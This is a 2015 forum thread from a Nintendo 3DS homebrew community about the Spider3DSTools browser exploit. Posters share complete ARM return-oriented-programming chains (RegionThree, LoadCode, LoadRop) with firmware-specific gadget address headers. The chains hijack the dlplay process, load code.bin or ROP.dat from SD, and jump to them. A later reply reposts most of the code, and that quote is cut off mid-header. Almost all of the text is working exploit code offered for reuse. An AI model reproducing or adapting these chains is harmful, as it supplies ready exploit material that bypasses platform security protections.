Homebrew [Custom Launcher] Spider3DSTools released

duke_srg · Feb 2, 2015

Also ending paddind is not needed if you run the ROP with my HTML loader it is padded inside JavaScript

MegaSynka · Feb 2, 2015

duke_srg said:
Also ending paddind is not needed if you run the ROP with my HTML loader it is padded inside JavaScript

Well this is for LoadCode, not RegionFree. I just wanted to share it nothing more.

duke_srg · Feb 2, 2015

MegaSynka said:
Well this is for LoadCode, not RegionFree. I just wanted to share it nothing more.

Actually you don't need to add an extra memcopy just for gxcommand data because dim in/out parameters not really matter, so it can be any trash or Initdata 1 in that case, or next ROP gadget command/data. Anyway there is no much sense shrinking the code below 544 bytes because of the last magic word of initdata/self

MegaSynka · Feb 2, 2015

duke_srg said:
Actually you don't need to add an extra memcopy just for gxcommand data because dim in/out parameters not really matter, so it can be any trash or Initdata 1 in that case, or next ROP gadget command/data. Anyway there is no much sense shrinking the code below 544 bytes because of the last magic word of initdata/self

No no, the memcpy copies the entire payload into buffer, so you can use the unused space as data for code.bin. I have a custom html page that injects dynamic data into the payload so my code.bin can read it.

duke_srg · Feb 2, 2015

MegaSynka said:
No no, the memcpy copies the entire payload into buffer, so you can use the unused space as data for code.bin. I have a custom html page that injects dynamic data into the payload so my code.bin can read it.

Yes, I did almost the same to pass a filename parameter data to VC injection code.bin. But I'm patching code.bin loaded data and only then copy it with GX command.

duke_srg · Feb 3, 2015

Here is the final (I hope) version for RegionThree ROP. The code is revised and version-specific data moved to headers, so now it is only one source file, just need to specify the right header for a specific firmware version. Hope this will help for ROP development.

Code:

#include "spider_rop.h"
@#include "spider_rop_4x.h"
@#include "spider_rop_5x_6x.h"

	.arm
	.text
	.global	_start
spiderRop:
	@copy code to dlplay
		@copy patch
			.word POP_R0_1_2_3_4_PC, SPIDER_GSPHEAPBUF, SPIDER_ROP_LOC + dlplayCode, dlplayCode_end - dlplayCode, GARBAGE, GARBAGE @ r0=dst, r1=src, r2=size
			.word MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR @ shared with gxCommand copy code stub to end of dlplay .text
gxCommand:
			.word GX_SetTextureCopy, SPIDER_GSPHEAPBUF, DLPLAY_CODE_LOC, BUFFER_SIZE, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000008

		[USER=273536]flush[/USER] data cache
			.word POP_R0_1_2_3_4_PC, HANDLE_PTR, KPROCESS_HANDLE, SPIDER_GSPHEAPBUF, BUFFER_SIZE, GARBAGE @ shared with gxCommand[8]
			.word POP_LR_PC, POP_PC
			.word GSPGPU_FlushDataCache

		@send GX command
			.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver + 0x58
			.word POP_R1_PC, SPIDER_ROP_LOC + gxCommand
			.word POP_LR_PC, POP_PC @ lr (pop pc)
			.word nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue

		[USER=68715]sleep[/USER] for a bit
			.word POP_R0_PC, 500000000 @ r0 (half second)
			.word POP_R1_PC, 0x00000000 @ r1 (nothing)
			.word POP_LR_PC, POP_PC @ lr (pop pc)
			.word SVC_0A_BX_LR

	@copy gsp interrupt handler table to linear heap
		[USER=273536]flush[/USER] data cache
			.word POP_R0_1_2_3_4_PC, HANDLE_PTR, KPROCESS_HANDLE, SPIDER_GSPHEAPBUF, BUFFER_SIZE, GARBAGE
			.word POP_LR_PC, POP_PC
			.word GSPGPU_FlushDataCache

		@send GX command
			.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver + 0x58
			.word POP_R1_PC, SPIDER_ROP_LOC + gxCommand2
			.word POP_LR_PC, POP_PC @ lr (pop pc)
			.word nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue

		[USER=68715]sleep[/USER] for a bit
			.word POP_R0_PC, 500000000 @ r0 (half second)
			.word POP_R1_PC, 0x00000000 @ r1 (nothing)
			.word POP_LR_PC, POP_PC @ lr (pop pc)
			.word SVC_0A_BX_LR

		@ needed for ROP
			.word POP_R0_PC, SPIDER_ROP_LOC+0x8C @ r0 InitData 1

	@copy gsp interrupt handler table back to dlplay after patching it
		@patch table
			.word POP_R0_1_2_3_4_PC, SPIDER_GSPHEAPBUF + 0x90, SPIDER_ROP_LOC + dlplayHook, dlplayHook_end - dlplayHook, GARBAGE, GARBAGE @ r0=dst, r1=src, r2=size
			.word MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR @ shared with gxCommand3 copy gsp interrupt handler ptr table back to dplay for spider linear heap
gxCommand3:
			.word GX_SetTextureCopy, SPIDER_GSPHEAPBUF, DLPLAY_HOOK_LOC, BUFFER_SIZE, 0xFFFFFFFF, SPIDER_ROP_LOC, 0x00000008 @ shared with InitData 2

			.word POP_PC @ InitData 4 shared with gcXommand3[8]

		[USER=273536]flush[/USER] data cache
			.word POP_R0_1_2_3_4_PC, HANDLE_PTR, KPROCESS_HANDLE, SPIDER_GSPHEAPBUF, BUFFER_SIZE, GARBAGE
			.word POP_LR_PC, POP_PC
			.word GSPGPU_FlushDataCache

		@send GX command
			.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver + 0x58 @ shared with InitData 5,6
			.word POP_R1_PC, SPIDER_ROP_LOC + gxCommand3
			.word POP_LR_PC, POP_PC @ lr (pop pc)
			.word nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue

		@trigger spider crash to return to menu
			.word 0xFFFFFFFF

	dlplayCode:
		ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
		ldr r0, [r0]

		mrc p15, 0, r1, c13, c0, 3
		add r1, #0x80
		ldr r2, =0x00100180 @ NSS:RebootSystem
		str r2, [r1], #4
		ldr r2, =0x00000001 @ flag
		str r2, [r1], #4
		ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
		str r2, [r1], #4
		ldr r2, =0x00000000 @ upper word PID
		str r2, [r1], #4
		ldr r2, =0x00000002 @ mediatype (2 for gamecard)
		str r2, [r1], #4
		ldr r2, =0x00000000 @ reserved
		str r2, [r1], #4
		ldr r2, =0x00000000 @ flag
		str r2, [r1], #4

		.word 0xef000032 @ svc 0x32 (sendsyncrequest)

		[USER=68715]sleep[/USER] forever and ever...
		ldr r0, =0xFFFFFFFF
		ldr r1, =0x0FFFFFFF
		.word 0xef00000a @ svc 0xa (sleep)

		.pool
	dlplayCode_end:
	dlplayHook:
		.fill 6, 4, DLPLAY_CODE_LOC_VA
	dlplayHook_end:
	gxCommand2:
	@ copy gsp interrupt handler ptr table to spider linear heap
		.word GX_SetTextureCopy, DLPLAY_HOOK_LOC, SPIDER_GSPHEAPBUF, BUFFER_SIZE, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000008, GARBAGE

		.fill 3, 4, GARBAGE
		.word MAGIC

Code:

#define DLPLAY_CODE_LOC_VA		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC			(0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18370000
#define SPIDER_ROP_LOC			0x08B88400

#define	HANDLE_PTR			0x003DA72C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x0012C1E0
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x0012BF04

#define POP_R0_1_2_3_4_PC		0x0010B5B4
#define	POP_R0_PC			0x0010C2FC
#define POP_R1_PC			0x00228AF4
#define POP_LR_PC			0x0013035C
#define POP_PC				0x001057C4

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x00240B54
#define SVC_0A_BX_LR			0x001041F8

#define BUFFER_SIZE			0x00000200

#define MAGIC				0x00130344
#define GARBAGE				0xDEADC0DE

Code:

#define DLPLAY_CODE_LOC_VA		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18410000
#define SPIDER_ROP_LOC			0x08B47400

#define	HANDLE_PTR			0x003B643C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x00344C2C
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003F54E8
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x002CF3EC

#define POP_R0_1_2_3_4_PC		0x0029C170
#define	POP_R0_PC			0x002AD574
#define POP_R1_PC			0x00269758
#define POP_LR_PC			0x002D6A34
#define POP_PC				0x0010DB6C

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x0029BF64
#define SVC_0A_BX_LR			0x002A513C

#define BUFFER_SIZE			0x00000200
                                        
#define MAGIC				0x002D6A1C
#define GARBAGE				0xDEADC0DE

Code:

#define DLPLAY_CODE_LOC_VA 		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18410000
#define SPIDER_ROP_LOC			0x088B5400

#define	HANDLE_PTR			0x003DA72C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x0012C228
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x0012BF4C

#define POP_R0_1_2_3_4_PC		0x0012A3D4
#define	POP_R0_PC			0x0010C320
#define POP_R1_PC			0x00228B10
#define POP_LR_PC			0x001303A4
#define POP_PC				0x001057E0

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x00240B5C
#define SVC_0A_BX_LR			0x0010420C

#define BUFFER_SIZE			0x00000200

#define MAGIC				0x0013038C
#define GARBAGE				0xDEADC0DE

duke_srg · Feb 3, 2015

And more! Here is converted LoadCode and LoadRop with updated headers, which can be compiled for 4x and 5x/6x. 4x/5x/6x versions unchecked and requires ROP.dat and code.bin specially compiled to run on appropriate firmware version

Code:

#include "spider_rop.h"
@#include "spider_rop_4x.h"
@#include "spider_rop_5x_6x.h"

#define BUFFER_LOC 0x18410000
#define CODE_SIZE 0x00004000
#define CODE_TARGET 0x19592000
#define CODE_JUMP 0x009D2000

	.arm
	.text
	.global	_start
_start:
	@ mount SD
		.word POP_R0_PC, DMC
		.word FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC, GARBAGE, GARBAGE, GARBAGE
	@ open file
		.word POP_R0_1_2_3_4_7_PC, 0x08F10000, SPIDER_ROP_LOC+FileName, 0x00000001, GARBAGE, GARBAGE, GARBAGE @ r0=this, r1=filename, r2=permissions
		.word IFile_Open_LDMFD_SP_R4_5_6_7_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE
		.word POP_PC
	@ read payload
		.word POP_R0_1_2_3_4_7_PC, 0x08F10000, 0x08F10020, BUFFER_LOC, CODE_SIZE, GARBAGE, GARBAGE @ r0=this, r1=total read, r2=buffer, r3=size
		.word IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
	[USER=273536]flush[/USER] data cache
		.word POP_R0_1_2_3_4_PC, HANDLE_PTR, KPROCESS_HANDLE, BUFFER_LOC, CODE_SIZE, GARBAGE
		.word POP_LR_PC, POP_PC
		.word GSPGPU_FlushDataCache
	@send GX command
		.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver + 0x58
		.word POP_R1_PC, SPIDER_ROP_LOC + gxCommand
		.word POP_LR_PC, POP_PC @ lr (pop pc)
		.word nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
	[USER=68715]sleep[/USER] for a bit
		.word POP_R0_PC, 1000000000 @ r0 (one second)
		.word POP_R1_PC, 0x00000000 @ r1 (nothing)
		.word POP_LR_PC, POP_PC @ lr (pop pc)
		.word SVC_0A_BX_LR
       	@ jump to code
		.word CODE_JUMP

	.fill 4, 4, GARBAGE
	.word SPIDER_ROP_LOC+_start+0x8C
	.fill 12, 4, GARBAGE
	.word SPIDER_ROP_LOC+_start, GARBAGE, POP_PC
gxCommand:
	.word 0x00000004 @ command header (SetTextureCopy)
	.word BUFFER_LOC @ source address
	.word CODE_TARGET @ destination address
	.word CODE_SIZE @ size
	.word 0xFFFFFFFF @ dim in
	.word 0xFFFFFFFF @ dim out
	.word 0x00000008 @ flags
	.word 0x00000000 @ unused

	.word GARBAGE, POP_PC, POP_PC
FileName:
	.string16 "dmc:/code.bin"
	.fill 80, 2, 0
	.word MAGIC

Code:

#include "spider_rop.h"
@#include "spider_rop_4x.h"
@#include "spider_rop_5x_6x.h"

#define BUFFER_LOC 0x08F01000
#define BUFFER_SIZE 0x00004000

	.arm
	.text
	.global	_start
_start:
	@ mount SD
		.word POP_R0_PC, DMC
		.word FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC, GARBAGE, GARBAGE, GARBAGE
	@ open file
		.word POP_R0_1_2_3_4_7_PC, 0x08F10000, SPIDER_ROP_LOC+FileName, 0x00000001, GARBAGE, GARBAGE, GARBAGE @ r0=this, r1=filename, r2=permissions
		.word IFile_Open_LDMFD_SP_R4_5_6_7_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE
		.word POP_PC
	@ read payload
		.word POP_R0_1_2_3_4_7_PC, 0x08F10000, 0x08F10020, BUFFER_LOC, BUFFER_SIZE, GARBAGE, GARBAGE @ r0=this, r1=total read, r2=buffer, r3=size
		.word IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
		.word POP_PC
		.word POP_PC
	@ jump to payload
		.word POP_R4_5_6_7_8_9_10_11_12_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, POP_PC
		.word LDMFD_SP_R4_5_6_LR_BX_R12, GARBAGE, GARBAGE, GARBAGE, BUFFER_LOC-4
		.word SP_LR_LDMFD_SP_LR_PC

	.fill 10, 4, GARBAGE
	.word SPIDER_ROP_LOC+_start+0x8C
	.fill 12, 4, GARBAGE
	.word SPIDER_ROP_LOC+_start, GARBAGE, POP_PC
	.fill 9, 4, GARBAGE
	.word POP_PC, POP_PC
FileName:
	.string16 "dmc:/ROP.dat"
	.fill 81, 2, 0
	.word MAGIC

Code:

#define DLPLAY_CODE_LOC_VA		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC			(0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18370000
#define SPIDER_ROP_LOC			0x08B88400

#define	HANDLE_PTR			0x003DA72C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x0012C1E0
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x0012BF04

#define POP_R0_1_2_3_4_PC		0x0010B5B4
#define	POP_R0_PC			0x0010C2FC
#define POP_R1_PC			0x00228AF4
#define POP_LR_PC			0x0013035C
#define POP_PC				0x001057C4

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x00240B54
#define SVC_0A_BX_LR			0x001041F8

#define MAGIC				0x00130344
#define GARBAGE				0xDEADC0DE

#define POP_R0_1_2_3_4_7_PC		0x001946EB
#define POP_R4_5_6_PC			0x0010014C
#define POP_R4_5_6_7_8_9_10_11_12_PC	0x001065A8
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA34
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0022FE0C
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001686E0
#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168768

#define DMC				0x001050B3
#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5AE0
#define SP_LR_LDMFD_SP_LR_PC		0x00130358

Code:

#define DLPLAY_CODE_LOC_VA		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18410000
#define SPIDER_ROP_LOC			0x08B47400

#define	HANDLE_PTR			0x003B643C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x00344C2C
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003F54E8
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x002CF3EC

#define POP_R0_1_2_3_4_PC		0x0029C170
#define	POP_R0_PC			0x002AD574
#define POP_R1_PC			0x00269758
#define POP_LR_PC			0x002D6A34
#define POP_PC				0x0010DB6C

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x0029BF64
#define SVC_0A_BX_LR			0x002A513C

#define MAGIC				0x002D6A1C
#define GARBAGE				0xDEADC0DE

#define POP_R0_1_2_3_4_7_PC		0x0017943B
#define POP_R4_5_6_PC			0x00100D24
#define POP_R4_5_6_7_8_9_10_11_12_PC	0x00103DA8
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x00332BEC
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0025B0A8
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x002FC8E8

#define DMC				0x002A5F27
#define LDMFD_SP_R4_5_6_LR_BX_R12	0x0018114C
#define SP_LR_LDMFD_SP_LR_PC		0x002D6A30

Code:

#define DLPLAY_CODE_LOC_VA 		0x00192800
#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200

#define SPIDER_GSPHEAPBUF		0x18410000
#define SPIDER_ROP_LOC			0x088B5400

#define	HANDLE_PTR			0x003DA72C
#define KPROCESS_HANDLE			0xFFFF8001

#define GX_SetTextureCopy		0x00000004
#define GSPGPU_FlushDataCache		0x0012C228
#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue	0x0012BF4C

#define POP_R0_1_2_3_4_PC		0x0012A3D4
#define	POP_R0_PC			0x0010C320
#define POP_R1_PC			0x00228B10
#define POP_LR_PC			0x001303A4
#define POP_PC				0x001057E0

#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR	0x00240B5C
#define SVC_0A_BX_LR			0x0010420C

#define MAGIC				0x0013038C
#define GARBAGE				0xDEADC0DE

#define POP_R0_1_2_3_4_7_PC		0x001946E3
#define POP_R4_5_6_PC			0x0010014C
#define POP_R4_5_6_7_8_9_10_11_12_PC	0x001065C4
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA2C
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0022FE48
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001686C4

#define DMC				0x001050CB
#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5AC0
#define SP_LR_LDMFD_SP_LR_PC		0x001303A0

Slushie3DS · Feb 3, 2015

duke_srg said:

And more! Here is converted LoadCode and LoadRop with updated headers, which can be compiled for 4x and 5x/6x. 4x/5x/6x versions unchecked and requires ROP.dat and code.bin specially compiled to run on appropriate firmware version

Code:

#include "spider_rop.h"
@#include "spider_rop_4x.h"
@#include "spider_rop_5x_6x.h"
 
#define BUFFER_LOC 0x18410000
#define CODE_SIZE 0x00004000
#define CODE_TARGET 0x19592000
#define CODE_JUMP 0x009D2000
 
.arm
.text
.global _start
_start:
@ mount SD
.word POP_R0_PC, DMC
.word FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC, GARBAGE, GARBAGE, GARBAGE
@ open file
.word POP_R0_1_2_3_4_7_PC, 0x08F10000, SPIDER_ROP_LOC+FileName, 0x00000001, GARBAGE, GARBAGE, GARBAGE @ r0=this, r1=filename, r2=permissions
.word IFile_Open_LDMFD_SP_R4_5_6_7_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE
.word POP_PC
@ read payload
.word POP_R0_1_2_3_4_7_PC, 0x08F10000, 0x08F10020, BUFFER_LOC, CODE_SIZE, GARBAGE, GARBAGE @ r0=this, r1=total read, r2=buffer, r3=size
.word IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
[USER=273536]flush[/USER] data cache
.word POP_R0_1_2_3_4_PC, HANDLE_PTR, KPROCESS_HANDLE, BUFFER_LOC, CODE_SIZE, GARBAGE
.word POP_LR_PC, POP_PC
.word GSPGPU_FlushDataCache
@send GX command
.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver + 0x58
.word POP_R1_PC, SPIDER_ROP_LOC + gxCommand
.word POP_LR_PC, POP_PC @ lr (pop pc)
.word nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word POP_R0_PC, 1000000000 @ r0 (one second)
.word POP_R1_PC, 0x00000000 @ r1 (nothing)
.word POP_LR_PC, POP_PC @ lr (pop pc)
.word SVC_0A_BX_LR
      @ jump to code
.word CODE_JUMP
 
.fill 4, 4, GARBAGE
.word SPIDER_ROP_LOC+_start+0x8C
.fill 12, 4, GARBAGE
.word SPIDER_ROP_LOC+_start, GARBAGE, POP_PC
gxCommand:
.word 0x00000004 @ command header (SetTextureCopy)
.word BUFFER_LOC @ source address
.word CODE_TARGET @ destination address
.word CODE_SIZE @ size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
 
.word GARBAGE, POP_PC, POP_PC
FileName:
.string16 "dmc:/code.bin"
.fill 80, 2, 0
.word MAGIC

Code:

#include "spider_rop.h"
@#include "spider_rop_4x.h"
@#include "spider_rop_5x_6x.h"
 
#define BUFFER_LOC 0x08F01000
#define BUFFER_SIZE 0x00004000
 
.arm
.text
.global _start
_start:
@ mount SD
.word POP_R0_PC, DMC
.word FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC, GARBAGE, GARBAGE, GARBAGE
@ open file
.word POP_R0_1_2_3_4_7_PC, 0x08F10000, SPIDER_ROP_LOC+FileName, 0x00000001, GARBAGE, GARBAGE, GARBAGE @ r0=this, r1=filename, r2=permissions
.word IFile_Open_LDMFD_SP_R4_5_6_7_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE
.word POP_PC
@ read payload
.word POP_R0_1_2_3_4_7_PC, 0x08F10000, 0x08F10020, BUFFER_LOC, BUFFER_SIZE, GARBAGE, GARBAGE @ r0=this, r1=total read, r2=buffer, r3=size
.word IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
.word POP_PC
.word POP_PC
@ jump to payload
.word POP_R4_5_6_7_8_9_10_11_12_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, POP_PC
.word LDMFD_SP_R4_5_6_LR_BX_R12, GARBAGE, GARBAGE, GARBAGE, BUFFER_LOC-4
.word SP_LR_LDMFD_SP_LR_PC
 
.fill 10, 4, GARBAGE
.word SPIDER_ROP_LOC+_start+0x8C
.fill 12, 4, GARBAGE
.word SPIDER_ROP_LOC+_start, GARBAGE, POP_PC
.fill 9, 4, GARBAGE
.word POP_PC, POP_PC
FileName:
.string16 "dmc:/ROP.dat"
.fill 81, 2, 0
.word MAGIC

Code:

#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
 
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
 
#define HANDLE_PTR 0x003DA72C
#define KPROCESS_HANDLE 0xFFFF8001
 
#define GX_SetTextureCopy 0x00000004
#define GSPGPU_FlushDataCache 0x0012C1E0
#define nn__gxlow__CTR__detail__GetInterruptReceiver 0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue 0x0012BF04
 
#define POP_R0_1_2_3_4_PC 0x0010B5B4
#define POP_R0_PC 0x0010C2FC
#define POP_R1_PC 0x00228AF4
#define POP_LR_PC 0x0013035C
#define POP_PC 0x001057C4
 
#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR 0x00240B54
#define SVC_0A_BX_LR 0x001041F8
 
#define MAGIC 0x00130344
#define GARBAGE 0xDEADC0DE
 
#define POP_R0_1_2_3_4_7_PC 0x001946EB
#define POP_R4_5_6_PC 0x0010014C
#define POP_R4_5_6_7_8_9_10_11_12_PC 0x001065A8
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC 0x0019CA34
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC 0x0022FE0C
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC 0x001686E0
#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC 0x00168768
 
#define DMC 0x001050B3
#define LDMFD_SP_R4_5_6_LR_BX_R12 0x002C5AE0
#define SP_LR_LDMFD_SP_LR_PC 0x00130358

Code:

#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
 
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B47400
 
#define HANDLE_PTR 0x003B643C
#define KPROCESS_HANDLE 0xFFFF8001
 
#define GX_SetTextureCopy 0x00000004
#define GSPGPU_FlushDataCache 0x00344C2C
#define nn__gxlow__CTR__detail__GetInterruptReceiver 0x003F54E8
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue 0x002CF3EC
 
#define POP_R0_1_2_3_4_PC 0x0029C170
#define POP_R0_PC 0x002AD574
#define POP_R1_PC 0x00269758
#define POP_LR_PC 0x002D6A34
#define POP_PC 0x0010DB6C
 
#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR 0x0029BF64
#define SVC_0A_BX_LR 0x002A513C
 
#define MAGIC 0x002D6A1C
#define GARBAGE 0xDEADC0DE
 
#define POP_R0_1_2_3_4_7_PC 0x0017943B
#define POP_R4_5_6_PC 0x00100D24
#define POP_R4_5_6_7_8_9_10_11_12_PC 0x00103DA8
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC 0x00332BEC
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC 0x0025B0A8
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC 0x002FC8E8
 
#define DMC 0x002A5F27
#define LDMFD_SP_R4_5_6_LR_BX_R12 0x0018114C
#define SP_LR_LDMFD_SP_LR_PC 0x002D6A30

Code:

#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
 
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x088B5400
 
#define HANDLE_PTR 0x003DA72C
#define KPROCESS_HANDLE 0xFFFF8001
 
#define GX_SetTextureCopy 0x00000004
#define GSPGPU_FlushDataCache 0x0012C228
#define nn__gxlow__CTR__detail__GetInterruptReceiver 0x003D7C40
#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue 0x0012BF4C
 
#define POP_R0_1_2_3_4_PC 0x0012A3D4
#define POP_R0_PC 0x0010C320
#define POP_R1_PC 0x00228B10
#define POP_LR_PC 0x001303A4
#define POP_PC 0x001057E0
 
#define MEMCPY_LDMFD_SP_R4_5_6_7_8_10_LR 0x00240B5C
#define SVC_0A_BX_LR 0x0010420C
 
#define MAGIC 0x0013038C
#define GARBAGE 0xDEADC0DE
 
#define POP_R0_1_2_3_4_7_PC 0x001946E3
#define POP_R4_5_6_PC 0x0010014C
#define POP_R4_5_6_7_8_9_10_11_12_PC 0x001065C4
#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC 0x0019CA2C
#define IFile_Open_LDMFD_SP_R4_5_6_7_PC 0x0022FE48
#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC 0x001686C4
 
#define DMC 0x001050CB
#define LDMFD_SP_R4_5_6_LR_BX_R12 0x002C5AC0
